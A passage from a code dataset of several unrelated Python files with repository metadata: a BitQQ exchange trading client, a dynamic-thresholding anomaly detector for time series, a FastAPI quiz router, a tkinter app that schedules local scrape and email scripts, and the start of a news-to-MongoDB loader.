增加签名\n if auth:\n if params is None:\n params = dict()\n\n params['userId'] = self.passphrase\n\n if params:\n query = \"&\".join([\"{}={}\".format(k, params[k]) for k in sorted(params.keys())])\n uri += '?' + query\n url = urljoin(self._host, uri)\n if self._order_module_host and is_order_module:\n url = urljoin(self._order_module_host, uri)\n\n headers = {\n 'Content-Type': 'application/json'\n }\n _, success, error = await AsyncHttpRequests.fetch(method, url, body=body, headers=headers, timeout=30)\n # print('原始结果:', success, error)\n logger.debug(url)\n if success:\n try:\n if isinstance(success, str):\n success = json.loads(success)\n if success.get('status') != 0 or success.get('msg') != 'success':\n return None, success\n except Exception as e:\n return None, e\n\n return success, error\n\n\nclass BitQQTrade:\n\n def __init__(self, **kwargs):\n \"\"\"\n 初始化\n \"\"\"\n e = None\n if not kwargs.get(\"account\"):\n e = Error(\"param account miss\")\n if not kwargs.get(\"strategy\"):\n e = Error(\"param strategy miss\")\n if not kwargs.get(\"symbol\"):\n e = Error(\"param symbol miss\")\n if not kwargs.get(\"host\"):\n kwargs[\"host\"] = \"http://dev.api.bitqq.vip:81\"\n if not kwargs.get(\"wss\"):\n kwargs['wss'] = 'wss://dev.websocket.bitqq.vip:9094'\n if not kwargs.get(\"access_key\"):\n e = Error(\"param access_key miss\")\n if not kwargs.get(\"secret_key\"):\n e = Error(\"param secret_key miss\")\n if not kwargs.get(\"passphrase\"):\n e = Error(\"param passphrase miss\")\n if e:\n logger.error(e, caller=self)\n if kwargs.get(\"init_success_callback\"):\n SingleTask.run(kwargs[\"init_success_callback\"], False, e)\n return\n\n self._account = kwargs[\"account\"]\n self._strategy = kwargs[\"strategy\"]\n self._platform = BITQQ\n self._symbol = kwargs[\"symbol\"]\n self._host = kwargs[\"host\"]\n self._order_module_host = kwargs.get('order_module_host')\n self._access_key = kwargs[\"access_key\"]\n self._secret_key = kwargs[\"secret_key\"]\n self._passphrase = kwargs[\"passphrase\"]\n self._asset_update_callback = kwargs.get(\"asset_update_callback\")\n self._order_update_callback = kwargs.get(\"order_update_callback\")\n self._position_update_callback = kwargs.get(\"position_update_callback\")\n self._init_success_callback = kwargs.get(\"init_success_callback\")\n self._contract_update_callback = kwargs.get('contract_update_callback')\n\n # 初始化 REST API 对象\n self._rest_api = BitQQRestAPI(self._host, self._access_key, self._secret_key, self._passphrase, order_module_host=self._order_module_host)\n\n if self._asset_update_callback:\n AssetSubscribe(self._platform, self._account, self.on_event_asset_update)\n\n SingleTask.call_later(self.reset_order_list, delay=10)\n\n @property\n def rest_api(self):\n return self._rest_api\n\n async def on_event_asset_update(self, asset: Asset):\n \"\"\"资产数据更新回调\"\"\"\n self._assets = asset\n SingleTask.run(self._asset_update_callback, asset)\n\n async def reset_order_list(self):\n # 撤销当前账号所有\n success, error = await self.revoke_all_order()\n if error:\n logger.error('撤销所有订单失败, error: ', error)\n SingleTask.call_later(self.reset_order_list, delay=1)\n else:\n if self._init_success_callback:\n SingleTask.run(self._init_success_callback, True, None)\n\n async def get_latest_price(self, symbol=None):\n if symbol is None:\n symbol = self._symbol\n success, error = await self._rest_api.get_latest_price(symbol)\n if success:\n if len(success['data']) > 0:\n success = success['data'][0]['price']\n else:\n success = None\n return success, error\n\n async def revoke_order(self, *order_nos):\n if len(order_nos) == 0:\n return [], Error('订单号传参错误')\n else:\n # 批量撤单\n result, error = await self._rest_api.revoke_orders(*order_nos)\n if error:\n for id in order_nos:\n await self.get_order_info(id)\n await asyncio.sleep(0.05)\n return [], error\n else:\n revoked_orders = result.get('data', [])\n # logger.info('批量撤单结果:', revoked_orders)\n for id in order_nos:\n if id not in revoked_orders:\n await self.get_order_info(id)\n await asyncio.sleep(0.05)\n return revoked_orders, None\n\n async def create_order(self, action, price, quantity, *args):\n result, error = await self._rest_api.create_order(action, self._symbol, price, quantity)\n if error:\n return None, error\n else:\n return result.get('data'), None\n\n def _update_order(self, order_info=None, s_order_id=None):\n \"\"\" 更新订单信息\n \"\"\"\n order = None\n if order_info:\n logger.debug('查询订单信息, order: ', order_info)\n order_no = str(order_info['id'])\n state = str(order_info[\"status\"])\n remain = float(order_info[\"surplusCount\"])\n utime = order_info[\"updateTime\"]\n ctime = order_info[\"createDate\"]\n action = ORDER_ACTION_BUY if str(order_info['orderType']) == \"1\" else ORDER_ACTION_SELL\n\n if state == \"5\":\n status = ORDER_STATUS_CANCELED\n elif state == \"2\":\n status = ORDER_STATUS_PARTIAL_FILLED\n elif state == \"3\":\n status = ORDER_STATUS_FILLED\n elif state == \"4\":\n status = ORDER_STATUS_PENDING_CANCEL\n else:\n status = ORDER_STATUS_SUBMITTED\n\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": order_no,\n \"action\": action,\n \"symbol\": order_info['symbol'],\n \"price\": order_info[\"putPrice\"],\n \"quantity\": order_info[\"count\"],\n }\n order = Order(**info)\n\n if order_info.get('dealPrice') is None:\n avg_price = 0.0\n else:\n avg_price = float(order_info.get('dealPrice'))\n\n order.remain = remain\n order.status = status\n order.avg_price = avg_price\n order.ctime = ctime\n order.utime = utime\n\n if s_order_id:\n info = {\n \"platform\": self._platform,\n \"account\": self._account,\n \"strategy\": self._strategy,\n \"order_no\": str(s_order_id),\n \"symbol\": self._symbol,\n }\n order = Order(**info)\n order.status = ORDER_STATUS_CANCELED\n\n if order and self._order_update_callback:\n SingleTask.run(self._order_update_callback, copy.copy(order))\n\n return order\n\n async def revoke_all_order(self):\n\n data, error = await self._rest_api.get_order_list(self._symbol)\n if error:\n return None, error\n\n else:\n open_order_ids = [item['id'] for item in data['data']['list']]\n if len(open_order_ids) == 0:\n return [], None\n result, error = await self._rest_api.revoke_orders(*open_order_ids)\n if error:\n return None, error\n else:\n revoked_order_ids = result.get('data', [])\n if revoked_order_ids == open_order_ids:\n return [], None\n else:\n unrevoked_num = len(open_order_ids) - len(revoked_order_ids)\n if unrevoked_num > 0:\n unrevoked_orders = [id for id in open_order_ids if id not in revoked_order_ids]\n return None, Error('还剩余{}个订单等待撤销,订单号为 {}'.format(unrevoked_num, unrevoked_orders))\n else:\n return [], None\n\n async def get_order_info(self, order_no):\n order_info, error = await self._rest_api.get_order_info(order_no)\n\n if error:\n if error:\n logger.debug('查询订单详情失败,订单id: {}, error:{}'.format(order_no, error))\n if isinstance(error, dict) and error.get('state') == 2500:\n logger.debug('订单已被数据库删除, id:', order_no)\n order = self._update_order(s_order_id=order_no)\n return copy.copy(order), None\n return None, error\n else:\n order = self._update_order(order_info['data'])\n return copy.copy(order), None\n","repo_name":"galendu/nextquant_inner","sub_path":"quant/platform/bitqq.py","file_name":"bitqq.py","file_ext":"py","file_size_in_byte":19167,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"} +{"seq_id":"73774371949","text":"\n# The below functions were taken from NASA JPL's 'telenanom' project that proposed the idea of nonparametric dynamic \n# thresholding. \n# The functions have been slightly modified for this project. I've made a few more parameters adjustable like p from\n# the detect_anomalies function for better testing\n\n# Standard modules\nimport progressbar\nfrom matplotlib import pyplot\nimport numpy as np\nimport math\nimport pandas as pd\nfrom itertools import groupby\nfrom operator import itemgetter\nimport more_itertools as mit\nfrom elasticsearch import Elasticsearch\nimport time\nimport json\nimport sys\nimport os\nimport math\nfrom scipy.stats import norm\n\noriginal_author = 'Peter Schneider'\nmod_by = 'Isaac Burmingham'\n\n\n# number of values to evaluate in each batch\nbatch_size = 70\n# number of trailing batches to use in error calculation\nwindow_size = 30\n# determines window size used in EWMA smoothing (percentage of total values for channel)\nsmoothing_perc = 0.05\n# num previous timesteps provided to model to predict future values\nl_s = 250\n# number of values surrounding an error that are brought into the sequence (promotes grouping on nearby sequences\nerror_buffer = 100\n# minimum percent decrease between max errors in anomalous sequences (used for pruning)\np = 0.35\n\n\ndef get_errors(y_test, y_hat, batch_size=70, window_size=30,smoothing_perc=0.05, anom=None, smoothed=True):\n \"\"\"Calculate the difference between predicted telemetry values and actual values, then smooth residuals using\n ewma to encourage identification of sustained errors/anomalies.\n\n Inputs:\n y_test (np array): array of test targets corresponding to true values to be predicted at end of each sequence\n y_hat (np array): predicted test values for each timestep in y_test\n anom (dict): contains anomaly information for a given input stream\n smoothed (bool): If False, return unsmooothed errors (used for assessing quality of predictions)\n\n\n Outputs:\n e (list): unsmoothed errors (residuals)\n e_s (list): smoothed errors (residuals)\n \"\"\"\n\n # e = [abs(y_h - y_t[0]) for y_h, y_t in zip(y_hat, y_test)]\n e = [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_test)]\n\n if not smoothed:\n return e\n\n smoothing_window = int(batch_size * window_size * smoothing_perc)\n if not len(y_hat) == len(y_test):\n raise ValueError(\n \"len(y_hat) != len(y_test), can't calculate error: %s (y_hat) , %s (y_test)\" % (len(y_hat), len(y_test)))\n\n e_s = list(pd.DataFrame(e).ewm(span=smoothing_window).mean().values.flatten())\n\n # for values at beginning < sequence length, just use avg\n if anom is None:\n e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n elif not anom['chan_id'] == 'C-2': # anom occurs early in window (limited data available for channel)\n e_s[:l_s] = [np.mean(e_s[:l_s * 2])] * l_s\n\n # np.save(os.path.join(\"data\", anom['run_id'], \"smoothed_errors\", anom[\"chan_id\"] + \".npy\"), np.array(e_s))\n\n return e_s\n\n\ndef process_errors(y_test, e_s, window_size = 30, batch_size=70, p=0.25):\n '''Using windows of historical errors (h = batch size * window size), calculate the anomaly\n threshold (epsilon) and group any anomalous error values into continuos sequences. Calculate\n score for each sequence using the max distance from epsilon.\n\n Args:\n y_test (np array): test targets corresponding to true telemetry values at each timestep t\n e_s (list): smoothed errors (residuals) between y_test and y_hat\n \n Optional:\n Window_size: Sets the window size\n\n Returns:\n E_seq (list of tuples): Start and end indices for each anomaloues sequence\n anom_scores (list): Score for each anomalous sequence\n '''\n\n i_anom = [] # anomaly indices\n\n num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n\n # decrease the historical error window size (h) if number of test values is limited\n while num_windows < 0:\n window_size -= 1\n if window_size <= 0:\n window_size = 1\n num_windows = int((y_test.shape[0] - (batch_size * window_size)) / batch_size)\n if window_size == 1 and num_windows < 0:\n raise ValueError(\"Batch_size (%s) larger than y_test (len=%s). Adjust batch_size.\" % (\n batch_size, y_test.shape[0]))\n\n # Identify anomalies for each new batch of values\n for i in range(1, num_windows + 2):\n prior_idx = (i - 1) * (batch_size)\n idx = (window_size * batch_size) + ((i - 1) * batch_size)\n\n if i == num_windows + 1:\n idx = y_test.shape[0]\n\n window_e_s = e_s[prior_idx:idx]\n window_y_test = y_test[prior_idx:idx]\n\n epsilon = find_epsilon(window_e_s, error_buffer)\n window_anom_indices = get_anomalies(window_e_s, window_y_test, epsilon, i - 1, i_anom, len(y_test),p)\n\n # update indices to reflect true indices in full set of values (not just window)\n i_anom.extend([i_a + (i - 1) * batch_size for i_a in window_anom_indices])\n\n # group anomalous indices into continuous sequences\n i_anom = sorted(list(set(i_anom)))\n groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n # calc anomaly scores based on max distance from epsilon for each sequence\n anom_scores = []\n for e_seq in E_seq:\n score = max([abs(e_s[x] - epsilon) / (np.mean(e_s) + np.std(e_s)) for x in range(e_seq[0], e_seq[1])])\n anom_scores.append(score)\n\n return E_seq, anom_scores\n\n\ndef find_epsilon(e_s, error_buffer, sd_lim=12.0):\n '''Find the anomaly threshold that maximizes function representing tradeoff between a) number of anomalies\n and anomalous ranges and b) the reduction in mean and st dev if anomalous points are removed from errors\n (see https://arxiv.org/pdf/1802.04431.pdf)\n\n Args:\n e_s (array): residuals between y_test and y_hat values (smoothes using ewma)\n error_buffer (int): if an anomaly is detected at a point, this is the number of surrounding values\n to add the anomalous range. this promotes grouping of nearby sequences and more intuitive results\n sd_lim (float): The max number of standard deviations above the mean to calculate as part of the\n argmax function\n\n Returns:\n sd_threshold (float): the calculated anomaly threshold in number of standard deviations above the mean\n '''\n\n mean = np.mean(e_s)\n sd = np.std(e_s)\n\n max_s = 0\n sd_threshold = sd_lim # default if no winner or too many anomalous ranges\n\n # it is possible for sd to be 0; avoid divide by zero error\n if sd == 0:\n return sd_threshold\n\n for z in np.arange(2.5, sd_lim, 0.5):\n epsilon = mean + (sd * z)\n pruned_e_s, pruned_i, i_anom = [], [], []\n\n for i, e in enumerate(e_s):\n if e < epsilon:\n pruned_e_s.append(e)\n pruned_i.append(i)\n if e > epsilon:\n for j in range(0, error_buffer):\n if not i + j in i_anom and not i + j >= len(e_s):\n i_anom.append(i + j)\n if not i - j in i_anom and not i - j < 0:\n i_anom.append(i - j)\n\n if len(i_anom) > 0:\n # preliminarily group anomalous indices into continuous sequences (# sequences needed for scoring)\n i_anom = sorted(list(set(i_anom)))\n groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n perc_removed = 1.0 - (float(len(pruned_e_s)) / float(len(e_s)))\n mean_perc_decrease = (mean - np.mean(pruned_e_s)) / mean\n sd_perc_decrease = (sd - np.std(pruned_e_s)) / sd\n s = (mean_perc_decrease + sd_perc_decrease) / (len(E_seq) ** 2 + len(i_anom))\n\n # sanity checks\n if s >= max_s and len(E_seq) <= 5 and len(i_anom) < (len(e_s) * 0.5):\n sd_threshold = z\n max_s = s\n\n return sd_threshold # multiply by sd to get epsilon\n\n\ndef compare_to_epsilon(e_s, epsilon, len_y_test, inter_range, chan_std,\n std, error_buffer, window, i_anom_full):\n '''Compare smoothed error values to epsilon (error threshold) and group consecutive errors together into\n sequences.\n\n Args:\n e_s (list): smoothed errors between y_test and y_hat values\n epsilon (float): Threshold for errors above which an error is considered anomalous\n len_y_test (int): number of timesteps t in test data\n inter_range (tuple of floats): range between 5th and 95 percentile values of error values\n chan_std (float): standard deviation on test values\n std (float): standard deviation of smoothed errors\n error_buffer (int): number of values surrounding anomalous errors to be included in anomalous sequence\n window (int): Count of number of error windows that have been processed\n i_anom_full (list): list of all previously identified anomalies in test set\n\n Returns:\n E_seq (list of tuples): contains start and end indices of anomalous ranges\n i_anom (list): indices of errors that are part of an anomlous sequnce\n non_anom_max (float): highest smoothed error value below epsilon\n '''\n\n i_anom = []\n E_seq = []\n non_anom_max = 0\n\n # Don't consider anything in window because scale of errors too small compared to scale of values\n if not (std > (.05 * chan_std) or max(e_s) > (.05 * inter_range)) or not max(e_s) > 0.05:\n return E_seq, i_anom, non_anom_max\n\n # ignore initial error values until enough history for smoothing, prediction, comparisons\n num_to_ignore = l_s * 2\n # if y_test is small, ignore fewer\n if len_y_test < 2500:\n num_to_ignore = l_s\n if len_y_test < 1800:\n num_to_ignore = 0\n\n for x in range(0, len(e_s)):\n\n anom = True\n if not e_s[x] > epsilon or not e_s[x] > 0.05 * inter_range:\n anom = False\n\n if anom:\n for b in range(0, error_buffer):\n if not x + b in i_anom and not x + b >= len(e_s) and (\n (x + b) >= len(e_s) - batch_size or window == 0):\n if not (window == 0 and x + b < num_to_ignore):\n i_anom.append(x + b)\n # only considering new batch of values added to window, not full window\n if not x - b in i_anom and ((x - b) >= len(e_s) - batch_size or window == 0):\n if not (window == 0 and x - b < num_to_ignore):\n i_anom.append(x - b)\n\n # capture max of values below the threshold that weren't previously identified as anomalies\n # (used in filtering process)\n for x in range(0, len(e_s)):\n adjusted_x = x + window * batch_size\n if e_s[x] > non_anom_max and not adjusted_x in i_anom_full and not x in i_anom:\n non_anom_max = e_s[x]\n\n # group anomalous indices into continuous sequences\n i_anom = sorted(list(set(i_anom)))\n groups = [list(group) for group in mit.consecutive_groups(i_anom)]\n E_seq = [(g[0], g[-1]) for g in groups if not g[0] == g[-1]]\n\n return E_seq, i_anom, non_anom_max\n\n\ndef prune_anoms(E_seq, e_s, non_anom_max, i_anom, p=0.25):\n '''Remove anomalies that don't meet minimum separation from the next closest anomaly or error value\n\n Args:\n E_seq (list of lists): contains start and end indices of anomalous ranges\n e_s (list): smoothed errors between y_test and y_hat values\n non_anom_max (float): highest smoothed error value below epsilon\n i_anom (list): indices of errors that are part of an anomlous sequnce\n p (float): minimum percent decrease\n Returns:\n i_pruned (list): remaining indices of errors that are part of an anomlous sequnces\n after pruning procedure\n '''\n\n E_seq_max, e_s_max = [], []\n for e_seq in E_seq:\n if len(e_s[e_seq[0]:e_seq[1]]) > 0:\n E_seq_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n e_s_max.append(max(e_s[e_seq[0]:e_seq[1]]))\n e_s_max.sort(reverse=True)\n\n if non_anom_max and non_anom_max > 0:\n e_s_max.append(non_anom_max) # for comparing the last actual anomaly to next highest below epsilon\n\n i_to_remove = []\n #p = 0.25 # TODO: don't hardcode this\n\n for i in range(0, len(e_s_max)):\n if i + 1 < len(e_s_max):\n if (e_s_max[i] - e_s_max[i + 1]) / e_s_max[i] < p:\n i_to_remove.append(E_seq_max.index(e_s_max[i]))\n # p += 0.03 # increase minimum separation by this amount for each step further from max error\n else:\n i_to_remove = []\n for idx in sorted(i_to_remove, reverse=True):\n del E_seq[idx]\n\n i_pruned = []\n for i in i_anom:\n keep_anomaly_idx = False\n\n for e_seq in E_seq:\n if i >= e_seq[0] and i <= e_seq[1]:\n keep_anomaly_idx = True\n\n if keep_anomaly_idx == True:\n i_pruned.append(i)\n\n return i_pruned\n\n\ndef get_anomalies(e_s, y_test, z, window, i_anom_full, len_y_test, p=0.25):\n '''Find anomalous sequences of smoothed error values that are above error threshold (epsilon). Both\n smoothed errors and the inverse of the smoothed errors are evaluated - large dips in errors often\n also indicate anomlies.\n\n Args:\n e_s (list): smoothed errors between y_test and y_hat values\n y_test (np array): test targets corresponding to true telemetry values at each timestep for given window\n z (float): number of standard deviations above mean corresponding to epsilon\n window (int): number of error windows that have been evaluated\n i_anom_full (list): list of all previously identified anomalies in test set\n len_y_test (int): num total test values available in dataset\n\n Returns:\n i_anom (list): indices of errors that are part of an anomlous sequnces\n '''\n\n perc_high, perc_low = np.percentile(y_test, [95, 5])\n inter_range = perc_high - perc_low\n\n mean = np.mean(e_s)\n std = np.std(e_s)\n chan_std = np.std(y_test)\n\n e_s_inv = [mean + (mean - e) for e in e_s] # flip it around the mean\n z_inv = find_epsilon(e_s_inv, error_buffer)\n\n epsilon = mean + (float(z) * std)\n epsilon_inv = mean + (float(z_inv) * std)\n\n # find sequences of anomalies greater than epsilon\n E_seq, i_anom, non_anom_max = compare_to_epsilon(e_s, epsilon, len_y_test,\n inter_range, chan_std, std, error_buffer, window,\n i_anom_full)\n\n # find sequences of anomalies using inverted error values (lower than normal errors are also anomalous)\n E_seq_inv, i_anom_inv, inv_non_anom_max = compare_to_epsilon(e_s_inv, epsilon_inv,\n len_y_test, inter_range, chan_std, std,\n error_buffer, window, i_anom_full)\n\n if len(E_seq) > 0:\n i_anom = prune_anoms(E_seq, e_s, non_anom_max, i_anom, p)\n\n if len(E_seq_inv) > 0:\n i_anom_inv = prune_anoms(E_seq_inv, e_s_inv, inv_non_anom_max, i_anom_inv, p)\n\n i_anom = list(set(i_anom + i_anom_inv))\n\n return i_anom\n\n\n# Not using because I don't have labeled anomalies\n# def evaluate_sequences(E_seq, anom):\n# '''Compare identified anomalous sequences with labeled anomalous sequences\n#\n# Args:\n# E_seq (list of lists): contains start and end indices of anomalous ranges\n# anom (dict): contains anomaly information for a given input stream\n#\n# Returns:\n# anom (dict): with updated anomaly information (whether identified, scores, etc.)\n# '''\n#\n# anom[\"false_positives\"] = 0\n# anom[\"false_negatives\"] = 0\n# anom[\"true_positives\"] = 0\n# anom[\"fp_sequences\"] = []\n# anom[\"tp_sequences\"] = []\n# anom[\"num_anoms\"] = len(anom[\"anomaly_sequences\"])\n#\n# E_seq_test = eval(anom[\"anomaly_sequences\"])\n#\n# if len(E_seq) > 0:\n#\n# matched_E_seq_test = []\n#\n# for e_seq in E_seq:\n#\n# valid = False\n#\n# for i, a in enumerate(E_seq_test):\n#\n# if (e_seq[0] >= a[0] and e_seq[0] <= a[1]) or (e_seq[1] >= a[0] and e_seq[1] <= a[1]) or \\\n# (e_seq[0] <= a[0] and e_seq[1] >= a[1]) or (a[0] <= e_seq[0] and a[1] >= e_seq[1]):\n#\n# anom[\"tp_sequences\"].append(e_seq)\n#\n# valid = True\n#\n# if i not in matched_E_seq_test:\n# anom[\"true_positives\"] += 1\n# matched_E_seq_test.append(i)\n#\n# if valid == False:\n# anom[\"false_positives\"] += 1\n# anom[\"fp_sequences\"].append([e_seq[0], e_seq[1]])\n#\n# anom[\"false_negatives\"] += (len(E_seq_test) - len(matched_E_seq_test))\n#\n# else:\n# anom[\"false_negatives\"] += len(E_seq_test)\n#\n# return anom\n\n#####################################\n# Function was created by CO Boulder student, Shawn Polson\n# Adjusted for this project by improving outputs and better choices of parameters by eliminating hardcodes of variables\n\ndef detect_anomalies(ts, normal_model, ds_name, var_name, alg_name, window_size = 30, batch_size=70, smoothing_perc=0.05,\n p=0.25,outlier_def='dynamic', num_stds=2, ndt_errors=None,\n plot_save_path=None, data_save_path=None):\n \"\"\"Detect outliers in the time series data by comparing points against a \"normal\" model.\n Inputs:\n ts [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n normal_model [pd Series]: A pandas Series with a DatetimeIndex and a column for numerical values.\n ds_name [str]: The name of the time series dataset.\n var_name [str]: The name of the dependent variable in the time series.\n alg_name [str]: The name of the algorithm used to create 'normal_model'.\n Optional Inputs:\n outlier_def [str]: {'std', 'errors', 'dynamic'} The definition of an outlier to be used. Can be 'std' for [num_stds] from the data's mean,\n 'errors' for [num_stds] from the mean of the errors, or 'dynamic' for nonparametric dynamic thresholding\n Default is 'std'.\n num_stds [float]: The number of standard deviations away from the mean used to define point outliers (when applicable).\n Default is 2.\n ndt_errors [list]: Optionally skip nonparametric dynamic thresholding's 'get_errors()' and use these values instead.\n plot_save_path [str]: The file path (ending in file name *.png) for saving plots of outliers.\n data_save_path [str]: The file path (ending in file name *.csv) for saving CSVs with outliers.\n Outputs:\n time_series_with_outliers [pd DataFrame]: A pandas DataFrame with a DatetimeIndex, two columns for numerical values, and an Outlier column (True or False).\n Optional Outputs:\n None\n Example:\n time_series_with_outliers = detect_anomalies(time_series, model, 'BatteryTemperature', 'Temperature (C)',\n 'ARIMA', 'dynamic', plot_path, data_path)\n \"\"\"\n\n X = ts.values\n Y = normal_model.values\n outliers = pd.Series()\n errors = pd.Series()\n time_series_with_outliers = pd.DataFrame({var_name: ts, alg_name: normal_model})\n time_series_with_outliers['Outlier'] = 'False'\n column_names = [var_name, alg_name, 'Outlier'] # column order\n time_series_with_outliers = time_series_with_outliers.reindex(columns=column_names) # sort columns in specified order\n\n # Start a progress bar\n widgets = [progressbar.Percentage(), progressbar.Bar(), progressbar.Timer(), ' ', progressbar.AdaptiveETA()]\n progress_bar_sliding_window = progressbar.ProgressBar(\n widgets=[progressbar.FormatLabel('Outliers (' + ds_name + ')')] + widgets,\n maxval=int(len(X))).start()\n\n\n # Define outliers using JPL's nonparamatric dynamic thresholding technique\n if outlier_def == 'dynamic':\n progress_bar_sliding_window.update(int(len(X))/2) # start progress bar timer\n outlier_points = []\n outlier_indices = []\n if ndt_errors is not None:\n smoothed_errors = ndt_errors\n else:\n smoothed_errors = get_errors(X, Y,window_size, batch_size, smoothing_perc)\n time_series_with_outliers['errors'] = smoothed_errors\n \n # These are the results of the nonparametric dynamic thresholding\n E_seq, anom_scores = process_errors(X, smoothed_errors,window_size, batch_size, p)\n progress_bar_sliding_window.update(int(len(X)) - 1) # advance progress bar timer\n\n # Convert sets of outlier start/end indices into outlier points\n for anom in E_seq:\n start = anom[0]\n end = anom[1]\n for i in range(start, end+1):\n time_series_with_outliers.at[ts.index[i], 'Outlier'] = 'True'\n outlier_points.append(X[i])\n outlier_indices.append(ts.index[i])\n outliers = outliers.append(pd.Series(outlier_points, index=outlier_indices))\n \n # Plot anomalies\n ax = ts.plot(color='#192C87', title=ds_name + ' with ' + alg_name + ' Outliers', label=var_name, figsize=(14, 6))\n normal_model.plot(color='#0CCADC', label=alg_name, linewidth=1.5)\n if len(outliers) > 0:\n print('Detected outliers (' + ds_name + '): ' + str(len(outliers)))\n outliers.plot(color='red', style='.', label='Outliers')\n ax.set(xlabel='Time', ylabel=var_name)\n pyplot.legend(loc='best')\n\n # Save plot\n if plot_save_path is not None:\n plot_dir = plot_save_path[:plot_save_path.rfind('/')+1]\n if not os.path.exists(plot_dir):\n os.makedirs(plot_dir)\n pyplot.savefig(plot_save_path, dpi=500)\n\n pyplot.show()\n pyplot.clf()\n\n # Save data\n if data_save_path is not None:\n data_dir = data_save_path[:data_save_path.rfind('/')+1]\n if not os.path.exists(data_dir):\n os.makedirs(data_dir)\n time_series_with_outliers.to_csv(data_save_path)\n\n return time_series_with_outliers\n","repo_name":"Isaacburmingham/multivariate-time-series-anomaly-detection","sub_path":"Algorithm Modeling Functions/nonparametric_dynamic_thresholding.py","file_name":"nonparametric_dynamic_thresholding.py","file_ext":"py","file_size_in_byte":22546,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"38"} +{"seq_id":"4681900095","text":"from typing import List\n\nfrom fastapi import APIRouter, Body, Depends, BackgroundTasks\nfrom pydantic import conint\nfrom sqlalchemy.orm import Session\n\nfrom src.question_service import question_service\nfrom .db.session import get_db\nfrom .schemas import Question\n\nrouter = APIRouter()\n\n\n@router.get('/', tags=['Root'])\nasync def root():\n return {'message': '200 OK'}\n\n\n@router.post(\n '/',\n tags=['Question'],\n response_model=List[Question],\n summary=\"Get quiz questions\"\n)\ndef get_question(\n *, db: Session = Depends(get_db),\n questions_num: conint(gt=0) = Body(1, embed=True),\n background_tasks: BackgroundTasks\n):\n background_tasks.add_task(\n question_service.get_and_save_questions,\n db=db,\n count=questions_num\n )\n\n return question_service.find(\n db=db,\n limit=questions_num\n )\n","repo_name":"MRainbowM/test_bewise","sub_path":"src/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5102965794","text":"# imports\n\nimport tkinter as tk\nimport subprocess\nimport schedule\nimport time\nimport threading\nimport datetime\n\n\nclass GUI:\n def __init__(self):\n self.root = tk.Tk()\n self.root.title(\"DomoLazeriai scrap APP. By IamGuber.\")\n \n # info log\n\n self.log = tk.Text(self.root, height=10, width=50)\n self.log.pack()\n \n # push button\n\n self.button = tk.Button(self.root, text=\"Start scrap\", command=self.start_function)\n self.button.pack()\n\n # push button2\n\n self.button = tk.Button(self.root, text=\"Start email\", command=self.start_function2)\n self.button.pack()\n \n # schedule the Start button to be clicked every day by clock\n\n schedule.every().day.at(\"06:00\").do(self.start_function)\n\n # schedule the Start button2 to be clicked every day by clock\n\n schedule.every().day.at(\"09:00\").do(self.start_function2)\n\n\n def start_function2(self):\n self.log.insert(tk.END, \"\\nStarting email sending...\\n\")\n\n # start email file sending\n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/mail_sending.py\"])\n self.log.insert(tk.END, \"Email send successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error sending email file: {str(e)}\\n\")\n \n\n def start_function(self):\n self.log.insert(tk.END, \"\\nStarting scrap function...\\n\")\n\n # start scrap file \n\n try:\n subprocess.Popen([\"python\", \"/Users/voisk/Desktop/SCRAPING APP/scrap.py\"])\n self.log.insert(tk.END, \"Scrap file started successfully.\\n\" f\"{datetime.datetime.now()}\")\n except Exception as e:\n self.log.insert(tk.END, f\"Error starting scrap file: {str(e)}\\n\")\n\n\n def run(self):\n\n # start the scheduler in a new thread\n\n schedule_thread = threading.Thread(target=self.schedule_loop, daemon=True)\n schedule_thread.start()\n \n # start the GUI\n\n self.root.mainloop()\n \n\n def schedule_loop(self):\n\n # run the scheduler loop in the background\n\n while True:\n schedule.run_pending()\n time.sleep(1)\n\n\n# create and run the GUI\n\ngui = GUI()\ngui.run()","repo_name":"IamGuber/Scrap-APP","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24825096294","text":"import json\r\n\r\nimport pandas\r\nfrom pre_processor import DocTokenizer\r\nfrom dictionary import Dictionary\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nimport pickle\r\nimport glob\r\nimport os\r\nfrom mongoengine import connect\r\nfrom model.news import NewsModel\r\n\r\ndoc_tokenizer = DocTokenizer()\r\ndata_set = '../IR-project-data-phase-3-100k'\r\n\r\nconnect('IREngine', host=\"mongodb://localhost:27017\")\r\n\r\n\r\n# def doc2file(doc_id):\r\ndef to_db():\r\n idx = 0\r\n for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n df = pandas.read_csv(filename, encoding='utf_8')\r\n\r\n for inn in range(df.shape[0]):\r\n\r\n idx += 1\r\n print('saving' + str(idx))\r\n doc = df.loc[inn, :]\r\n content = doc_tokenizer.clean_html(doc['content'])\r\n publish_date = doc['publish_date']\r\n title = doc['title']\r\n url = doc['url']\r\n summary = doc['summary']\r\n if type(summary) is float:\r\n summary = ' '\r\n meta_tags = json.loads(doc['meta_tags'])\r\n thumbnail = doc['thumbnail']\r\n if type(thumbnail) is float:\r\n thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n if type(title) is float:\r\n title = \"خبر\"\r\n news = NewsModel()\r\n news.meta_tags = meta_tags\r\n news.thumbnail = thumbnail\r\n news.url = url\r\n news.content = content\r\n news.publish_date = publish_date\r\n news.summary = summary\r\n 